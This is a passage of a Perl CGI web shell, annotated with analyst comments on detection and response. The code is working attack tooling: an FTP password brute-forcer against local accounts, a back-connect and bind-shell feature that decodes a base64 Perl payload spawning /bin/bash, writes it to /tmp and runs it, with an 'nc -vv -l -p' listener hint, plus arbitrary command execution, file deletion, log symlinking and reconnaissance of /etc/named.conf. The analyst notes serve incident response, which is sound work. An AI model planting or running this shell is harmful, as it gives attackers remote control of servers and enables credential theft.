</td>
</tr>
<tr>
<td colspan="2" align="center">
Sleep:<select name="sleep">

<option>0</option>
<option>1</option>
<option>2</option>

<option>3</option>
</select> 
<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
</form>
</table>
END
return $result;
}
# Handles the "bruteforcer" action. With no user list submitted it returns the
# input form. Otherwise it takes the newline-separated "user" and "pass"
# fields, and for every non-empty user name tries each password against the
# FTP service at the server's own address (SERVER_ADDR), opening a new
# Net::FTP connection per attempt and optionally sleeping between attempts.
# Accepted pairs are added to the returned HTML as ftp:// links.
# For responders: the FTP service log would show a run of failed logins for
# many local accounts, all originating from the server's own address.
sub BruteForcer
{
	my $result="";
	$Server=$ENV{'SERVER_ADDR'};
	if($in{'user'} eq "")
	{
		$result .= &BruteForcerForm;
	}else
	{
		use Net::FTP; 
		@user= split(/\n/, $in{'user'});
		@pass= split(/\n/, $in{'pass'});
		chomp(@user);
		chomp(@pass);
		$result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
		foreach $username (@user)
		{
			if(!($username eq ""))
			{
				foreach $password (@pass)
				{
					$ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; 
					if($ftp->login("$username","$password"))
					{
						$result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
						$ftp->quit();
						break;
					}
					if(!($in{'sleep'} eq "0"))
					{
						sleep(int($in{'sleep'}));
					}
					$ftp->quit();
				}
			}
		}
		$result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
	}
	return $result;
}
sub BackBindForm
{
	return <<END;
	<br><br>

	<table>
	<tr>
	<form name="f" method="POST" action="$ScriptLocation">
	<td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
	<td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
	 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>

	<td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
	</form>
	</tr>
	<tr>
	<td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
	<br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
	<br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>

	</tr>
	</table>

	<br><br>
	<table>
	<tr>
	<form method="POST" action="$ScriptLocation">
	<td>Bind Port: <input type="hidden" name="a" value="backbind"></td>

	<td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">

	 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
	<td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
	</form>
	</tr>
	<tr>
	<td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
	<br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>

	</tr>
	</table><br>
END
}
sub BackBind
{
	use MIME::Base64;
	use Socket;	
	$backperl="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";
	$bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";

	$ClientAddr = $in{'clientaddr'};
	$ClientPort = int($in{'clientport'});
	if($ClientPort eq 0)
	{
		return &BackBindForm;
	}elsif(!$ClientAddr eq "")
	{
		$Data=decode_base64($backperl);
		if(-w "/tmp/")
		{
			$File="/tmp/backconnect.pl";	
		}else
		{
			$File=$CurrentDir.$PathSep."backconnect.pl";
		}
		open(FILE, ">$File");
		print FILE $Data;
		close FILE;
		system("perl backconnect.pl $ClientAddr $ClientPort");
		unlink($File);
		exit 0;
	}else
	{
		$Data=decode_base64($bindperl);
		if(-w "/tmp")
		{
			$File="/tmp/bindport.pl";	
		}else
		{
			$File=$CurrentDir.$PathSep."bindport.pl";
		}
		open(FILE, ">$File");
		print FILE $Data;
		close FILE;
		system("perl bindport.pl $ClientPort");
		unlink($File);
		exit 0;
	}
}
# Deletes a directory tree: unlinks every entry other than "." and "..",
# recursing into sub-directories, then calls rmdir on the directory itself.
# Failures are ignored (the rmdir failure branch is empty). The directory
# handle DIR and the loop variable $file are package globals shared by every
# level of the recursion, so a removal may be left incomplete.
sub RmDir($) 
{
	my $dir = shift;
    if(opendir(DIR,$dir))
	{
		while($file = readdir(DIR))
		{
			if(($file ne ".") && ($file ne ".."))
			{
				$file= $dir.$PathSep.$file;
				if(-d $file)
				{
					&RmDir($file);
				}
				else
				{
					unlink($file);
				}
			}
		}
		closedir(DIR);
	}
	if(!rmdir($dir))
	{
		
	}
}
# Returns "user/group" for an existing path on non-Windows hosts, resolved
# from the stat uid/gid through getpwuid/getgrgid. Returns "???" on Windows
# or when the path does not exist. Sets the globals $uid, $gid, $name, $group.
sub FileOwner($)
{
	my $file = shift;
	if(-e $file)
	{
		# Elements 4 and 5 of stat() are the owner uid and gid.
		($uid,$gid) = (stat($file))[4,5];
		if($WinNT)
		{
			return "???";
		}
		else
		{
			$name=getpwuid($uid);
			$group=getgrgid($gid);
			return $name."/".$group;
		}
	}
	return "???";
}
# Returns the parent of the global $CurrentDir, obtained by running
# "cd <dir>; cd ..; pwd" (or the Windows equivalent) through the shell.
# The argument is read but then overwritten with the command output.
sub ParentFolder($)
{
	my $path = shift;
	my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
	# chop removes the last character of the command output (the newline).
	chop($path = `$Comm`);
	return $path;
}
# Returns a permission string for a path. On Windows: "r / w" style, with "-"
# for a missing right, based on the -r and -w tests. Elsewhere: the four-digit
# octal mode from stat(). Returns "0000" when the path does not exist.
# Sets the globals $mode and $result on the non-Windows path.
sub FilePerms($)
{
	my $file = shift;
	my $ur = "-";
	my $uw = "-";
	if(-e $file)
	{
		if($WinNT)
		{
			if(-r $file){ $ur = "r"; }
			if(-w $file){ $uw = "w"; }
			return $ur . " / " . $uw;
		}else
		{
			# Keep only the permission bits (including setuid/setgid/sticky).
			$mode=(stat($file))[2];
			$result = sprintf("%04o", $mode & 07777);
			return $result;
		}
	}
	return "0000";
}
# Returns the modification time of an existing path formatted as
# "DD/M/YYYY HH:MM" in local time, or "???" when the path does not exist.
# Sets the globals $la, $d, $m, $y, $h, $i, @month and $lmtime.
sub FileLastModified($)
{
	my $file = shift;
	if(-e $file)
	{
		# Element 9 of stat() is the last-modified time.
		($la) = (stat($file))[9];
		($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
		# localtime returns years since 1900 and a zero-based month index.
		$y = $y + 1900;
		@month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
		$lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
		return $lmtime;
	}
	return "???";
}
sub FileSize($)
{
	# Size in bytes of a plain file as reported by -s; the string "0" for
	# anything that is not a plain file (directories, missing paths).
	my ($candidate) = @_;
	return "0" unless -f $candidate;
	return -s $candidate;
}
sub ParseFileSize($)
{
	# Format a byte count for display: values up to 1024 are shown in bytes,
	# values up to 1024*1024 in KB, and anything larger in MB; the last two
	# are printed with two decimals.
	my ($bytes) = @_;
	return $bytes. " B" if $bytes <= 1024;
	return sprintf("%.02f",$bytes / 1024)." KB" if $bytes <= 1024*1024;
	return sprintf("%.2f",$bytes / 1024 / 1024)." MB";
}
sub trim($)
{
	# Return a copy of the argument with leading and trailing whitespace
	# removed; the caller's value is not modified.
	my ($text) = @_;
	for ($text)
	{
		s/^\s+//;	# whitespace at the start
		s/\s+$//;	# whitespace at the end
	}
	return $text;
}
sub AddSlashes($)
{
	# Return a copy of the argument with every backslash doubled.
	my ($text) = @_;
	(my $doubled = $text) =~ s/(\\)/$1$1/g;
	return $doubled;
}
# Returns the HTML file-manager view for the global $CurrentDir: a path form,
# then one table row per directory and per file (each group sorted
# case-insensitively) showing size, owner, permissions, modification time and
# action links (edit, rename, download, remove).
# File and directory names are read from disk and inserted into HTML
# attributes and inline JavaScript without any escaping.
# Sets the globals $file, $f, $dirname and $view.
sub ListDir
{
	my $path = $CurrentDir.$PathSep;
	# Collapse doubled backslashes in the path.
	$path=~ s/\\\\/\\/g;
	my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
	if(-d $path)
	{
		my @fname = ();
		my @dname = ();
		# Split directory entries into sub-directories and everything else.
		if(opendir(DIR,$path))
		{
			while($file = readdir(DIR))
			{
				$f=$path.$file;
				if(-d $f)
				{
					push(@dname,$file);
				}
				else
				{
					push(@fname,$file);
				}
			}
			closedir(DIR);
		}
		@fname = sort { lc($a) cmp lc($b) } @fname;
		@dname = sort { lc($a) cmp lc($b) } @dname;
		$result .= "<div><table width='90%' class='listdir'>

		<tr style='background-color: #ef1c1c57'><th>File Name</th>
		<th style='width:100px;'>File Size</th>
		<th style='width:150px;'>Owner</th>
		<th style='width:100px;'>Permission</th>
		<th style='width:150px;'>Last Modified</th>
		<th style='width:260px;'>Action</th></tr>";
		# $style alternates between the two row classes; $i numbers the rows
		# so the page script can address individual cells.
		my $style="line";
		my $i=0;
		foreach my $d (@dname)
		{
			$style= ($style eq "line") ? "notline": "line";
			$d = &trim($d);
			$dirname=$d;
			# Turn the entry into a full path; ".." is resolved via the shell.
			if($d eq "..") 
			{
				$d = &ParentFolder($path);
			}
			elsif($d eq ".") 
			{
				$d = $path;
			}
			else 
			{
				$d = $path.$d;
			}
			$result .= "<tr class='$style'>

			<td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
			$result .= "<td>DIR</td>";
			$result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
			$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
			$result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
			$result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
			$result .= "</tr>";
			$i++;
		}
		foreach my $f (@fname)
		{
			$style= ($style eq "line") ? "notline": "line";
			$file=$f;
			$f = $path.$f;
			$view = "?dir=".$path."&view=".$f;
			$result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
			$result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
			$result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
			$result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
			$result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
			$result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
			$result .= "</tr>";
			$i++;
		}
		$result .= "</table></div>";
	}
	return $result;
}
# ViewDomainUser: returns an HTML fragment listing lines of /etc/named.conf
# that contain a zone declaration, each next to a local account name.
#
# Analyst notes:
#   - This is host reconnaissance. It reads /etc/named.conf and stat()s paths
#     under /etc/valiases/, so it presumably targets shared-hosting servers
#     that keep per-domain files there (TODO confirm layout on the affected
#     host).
#   - Detection: the web server / CGI account opening /etc/named.conf or
#     stat()ing /etc/valiases/* is unusual; file-access auditing on those
#     paths will surface it.
#   - Hardening: these files do not need to be readable by the account that
#     runs CGI scripts.
#   - $err, $filename and $owner are package globals (no `my`); $err is only
#     ever set here, never cleared.
sub ViewDomainUser
{
	# Two-argument open on a bareword handle; a failure only sets $err.
	open (domains, '/etc/named.conf') or $err=1;
	# Reads the whole file into memory, one element per line.
	my @cnzs = <domains>;
	# Note the handle name here (d0mains) differs from the one opened above.
	close d0mains;
	my $style="line";
	my $result="<h5><font style='font: 15pt Verdana;color: #fff;'>Hoang Sa - Truong Sa</font></h5>";
	if ($err)
	{
		# Could not open the file: return the banner plus an error paragraph.
		$result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
		return $result;
	}else
	{
		$result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
	}
	foreach my $one (@cnzs)
	{
		# Only lines containing: zone "<name>" {   are reported.
		if($one =~ m/.*?zone "(.*?)" {/)
		{	
			$style= ($style eq "line") ? "notline": "line";
			# The path is built from $one (the whole input line), not from
			# the capture group of the match above.
			$filename= "/etc/valiases/".$one;
			# Field 4 of stat() is the owner uid; getpwuid maps it to a name.
			$owner = getpwuid((stat($filename))[4]);
			# Single-quoted string: "$style" is emitted literally, and $one
			# is inserted into the HTML without escaping.
			$result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
		}
	}
	$result .= '</table>';
	return $result;
}
# ViewLog: returns an HTML table with one row per hard-coded Apache log path.
# Each row is a form that posts a=command, c="less <path>" and d=$CurrentDir
# back to this script, i.e. it goes through the "command" action.
# On Windows ($WinNT true) it returns a fixed message instead.
#
# Analyst notes:
#   - Artifacts: for a log the process cannot write, the sub shells out to
#     `ln -s <log> error_log_<n>` (n = 0..2) in the process's working
#     directory. Symlinks with those names next to the script, and `ln`
#     child processes of the web server / CGI account, are indicators.
#   - The -w test checks whether this process may write to the log;
#     presumably the author cares about logs it could alter (inference, not
#     shown in this sub). Check the listed logs for gaps or edits during
#     triage and prefer off-host copies.
#   - Hardening: web logs should not be writable by the account that runs
#     CGI scripts; forward logs to a separate host.
sub ViewLog
{
	if($WinNT)
	{
		return "<h2><font style='font: 20pt Verdana;color: #fff;'>Don't run on Windows</font></h2>";
	}
	my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
	# Fixed candidate list; nothing here comes from the request.
	my @pathlog=(
				'/usr/local/apache/logs/error_log',
				'/var/log/httpd/error_log',
				'/usr/local/apache/logs/access_log'
				);
	my $i=0;
	# $perms is declared once outside the loop, so a value set for one log
	# carries over to the next row unless it is overwritten.
	my $perms;
	my $sl;
	foreach my $log (@pathlog)
	{
		if(-w $log)
		{
			$perms="OK";
		}else
		{
			# Backticks run the command through the shell; stdout goes to $sl.
			chop($sl = `ln -s $log error_log_$i`);
			# NOTE(review): the checks below read $ls, while the ln output
			# was stored in $sl; $ls is not assigned anywhere in this sub,
			# so the status cell should not be read as the outcome of ln.
			if(&trim($ls) eq "")
			{
				if(-r $ls)
				{
					$perms="OK";
					$log="error_log_".$i;
				}
			}else
			{
				$perms="<font style='color: red;'>Cancel<font>";
			}
		}
		# Interpolating heredoc: $i, $log, $CurrentDir and $perms are written
		# into the markup as-is. $CurrentDir originates from the "d" request
		# parameter and is not HTML-escaped here.
		$result .=<<END;
		<tr>

			<form action="" method="post">
			<td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
			<td><input class="submit" type="submit" value="Try" /></td>
			<input type="hidden" id="log_$i" name="c" value="less $log"/>
			<input type="hidden" name="a" value="command" />
			<input type="hidden" name="d" value="$CurrentDir" />
			</form>
			<td>$perms</td>

		</tr>
END
		$i++;
	}
	$result .="</table>";
	return $result;
}
# ---------------------------------------------------------------------------
# Request entry point: runs on every HTTP request to this script.
# Parses the request and cookies, checks the login cookie, then dispatches on
# the "a" parameter to one handler and prints the page footer.
#
# Analyst notes (triage / detection):
#   - Parameters read in this block: p, c, f, o, a, d, chmod, rename, remove,
#     data, file. GET requests leave them in the access log query string
#     (for example a=gui&d=...&remove=...); POST bodies are normally not
#     logged, so absence from the access log does not mean absence of use.
#   - The only access check is a string comparison between the SAVEDPWD
#     cookie and the hard-coded $Password, so the cookie carries the password
#     itself. A request bearing a SAVEDPWD cookie is a usable network
#     indicator, and anyone who read the file or the traffic could
#     authenticate.
#   - Action names handled: login, gui, command, save, upload, backbind,
#     bruteforcer, download, checklog, domainsuser, logout. Most handlers are
#     defined outside this block; what they do should be read from their own
#     definitions.
#   - Host telemetry: this block spawns `pwd`/`cd` and `chmod` through the
#     shell, and calls rename() and unlink() directly. Child processes of the
#     web server / CGI account are the most reliable host-side signal.
#   - Response: treat the host as compromised, preserve the file and logs,
#     rotate credentials reachable from the web account, and look for how
#     the file was written (it sits under an upload/image directory).
# ---------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
# Request-controlled values copied into package globals.
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};

# A request without an "a" parameter falls through to the command handler.
$Action = "command" if($Action eq "");

$CurrentDir = &trim($in{'d'});
# Default command when "c" is empty.
$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
# No "d" given: ask the shell for the working directory ($CmdPwd is "cd" on
# Windows and "pwd" otherwise, set earlier in the file).
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

# Plain string equality between the cookie value and the stored password.
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn)
{
	# Every unauthenticated request ends up here, whatever action it asked for.
	&PerformLogin;
}elsif($Action eq "gui")
{
	# File-manager view: optional chmod, rename and remove, then a listing.
	&PrintPageHeader;
	if(!$WinNT)
	{
		# int() forces the mode to a number; string comparison with 0 skips
		# the branch when no usable mode was supplied.
		$chmod=int($in{'chmod'});
		if(!($chmod eq 0))
		{
			$chmod=int($in{'chmod'});
			# Path is built from the "d" and "f" request parameters and then
			# interpolated into a shell command line.
			$file=$CurrentDir.$PathSep.$TransferFile;
			chop($result= `chmod $chmod "$file"`);
			# Empty captured output is taken as success.
			if(&trim($result) eq "")
			{
				print "<run> Done! </run><br>";
			}else
			{
				print "<run> Sorry! You dont have permissions! </run><br>";
			}
		}
	}
	$rename=$in{'rename'};
	# Parsed as (!$rename) eq "": true when $rename is a true value.
	if(!$rename eq "")
	{
		# Both names are used as given; $CurrentDir is not prepended here,
		# unlike the chmod and remove branches.
		if(rename($TransferFile,$rename))
		{
			print "<run> Done! </run><br>";
		}else
		{
			print "<run> Sorry! You dont have permissions! </run><br>";
		}
	}
	$remove=$in{'remove'};
	if($remove ne "")
	{
		$rm = $CurrentDir.$PathSep.$remove;
		# Directories go to RmDir (defined elsewhere); anything else is
		# unlinked directly.
		if(-d $rm)
		{
			&RmDir($rm);
		}else
		{
			if(unlink($rm))
			{
				print "<run> Done! </run><br>";
			}else
			{
				print "<run> Sorry! You dont have permissions! </run><br>";
			}			
		}
	}
	print &ListDir;

}
elsif($Action eq "command")	
{
	# ExecuteCommand is defined elsewhere; presumably it acts on $RunCommand
	# (the "c" parameter) - confirm against its definition.
	&PrintPageHeader("c");
	print &ExecuteCommand;
}
elsif($Action eq "save")
{
	# Passes the "data" and "file" request parameters to SaveFile.
	&PrintPageHeader;
	if(&SaveFile($in{'data'},$in{'file'}))
	{
		print "<run> Done! </run><br>";
	}else
	{
		print "<run> Sorry! You dont have permissions! </run><br>";
	}
	print &ListDir;
}
elsif($Action eq "upload")
{
	&PrintPageHeader;

	print &UploadFile;
}
elsif($Action eq "backbind")
{
	# Handler defined elsewhere; the header argument is "clientport".
	&PrintPageHeader("clientport");
	print &BackBind;
}
elsif($Action eq "bruteforcer") 
{
	&PrintPageHeader;
	print &BruteForcer;
}elsif($Action eq "download") 
{
	# No page header is printed for this action.
	print &DownloadFile;
}elsif($Action eq "checklog") 
{
	&PrintPageHeader;
	print &ViewLog;

}elsif($Action eq "domainsuser") 
{
	&PrintPageHeader;
	print &ViewDomainUser;
}elsif($Action eq "logout") 
{
	&PerformLogout;
}
# Printed for every request, including unknown action names.
&PrintPageFooter;